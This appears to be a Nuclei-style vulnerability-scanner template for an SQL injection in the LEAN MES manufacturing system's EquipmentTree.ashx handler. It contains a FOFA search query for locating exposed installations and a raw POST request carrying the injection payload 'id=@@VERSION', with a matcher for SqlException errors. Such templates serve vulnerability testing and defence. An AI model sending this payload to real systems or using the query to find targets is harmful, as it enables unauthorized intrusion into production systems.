id: skt-mes-EquipmentTree-sqli
info:
  name: 深科特LEAN MES系统 EquipmentTree.ashx 存在SQL注入
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://vip.bdziyi.com/59711/
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: title="LEAN MES - 用户登录" || body="Content/js/skt.utility.checkmobile.js" || body="../MobileApp/VerifyError.aspx" || body="Content/login/login2/multiplant_top.png"
    tips:
    repair:
    version:
  tags: skt-mes,sqli

http:
  - raw:
      - |
        POST /Handler/EquipmentTree.ashx HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.1307.119 Safari/537.36
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 11

        id=@@VERSION
        
    matchers:
      - type: dsl
        dsl:
          - status_code == 500
          - contains_all(body,'SqlException')
        condition: and